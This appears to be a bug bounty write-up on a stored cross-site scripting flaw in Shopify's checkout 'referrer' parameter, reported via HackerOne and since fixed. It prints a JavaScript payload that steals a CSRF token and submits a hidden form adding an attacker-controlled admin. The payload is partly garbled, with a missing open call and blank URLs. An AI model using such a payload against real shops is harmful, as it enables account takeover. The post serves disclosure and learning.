How we tookover shopify accounts with one single click

To keep up with the security companies we often spend some time on bug bounties. That was a very boring weekend till we found out that Shopify has published their bbp on hackerone. By the time i turned back and forth all my teammates were plugged in. We found many cool vulnerabilities like privilege escalation, a few xss’s and a Oauth redirect bypass.

In this blog post I am going to show you guys how I used a persistent cross site scripting to takeover shops. This vulnerability can be easily exploited and any customer/User can takeover the shop.

When a customer purchases any product from a shop in shopify, they will be redirected to a checkout page. While redirected the request is sent with two other parameters. In those two parameters there is an interesting parameter called referrer. This referrer parameter tracks the customers , for example if there is a “buy now” button embedded on and a customer clicks on it to buy a product then this referrer value is reflected in the admin panel of the shop as shown in the screenshot below.

So to takeover the shop, a customer has to simply purchase a product from this address with the referrer parameter set to payload



To make it more fun , We wrote a code to add admins on every click. This way one could takeover a shop!

PS: After reporting this vulnerability shopify has started using CSP , as an extra measure to protect their customers from these kind of vulnerabilities. With CSP it isn’t possible to execute inline script.


var xhr = new XMLHttpRequest();"GET", "", false);
var token = xhr.responseText;
var pos = token.indexOf("csrf-param");
document.write("<html><body><form action= '' method='POST'>
<input type='hidden' name='utf8' value='â&#156;&#147;'>
<input type='hidden' name='authenticity&#95;token' value='"+token+"'/>
<input type='hidden' name='user&#91;first&#95;name&#93;' value='hacked' />
<input type='hidden' name='user&#91;last&#95;name&#93;' value='hacked'>
<input type='hidden' name='user&#91;email&#93;' value='example&#43;hacked&#64;hotmail&#46;com' />
<input type='hidden' name='&#95;method' value='post'>
<input type='submit' value='Submit form'></form>


We reported this vulnerability to Shopify via hackerone. This vulnerability is fixed now and cannot be reproduced.

Shopify rewarded us with a decent bounty , which made our next weekend really amazing.

Share this story: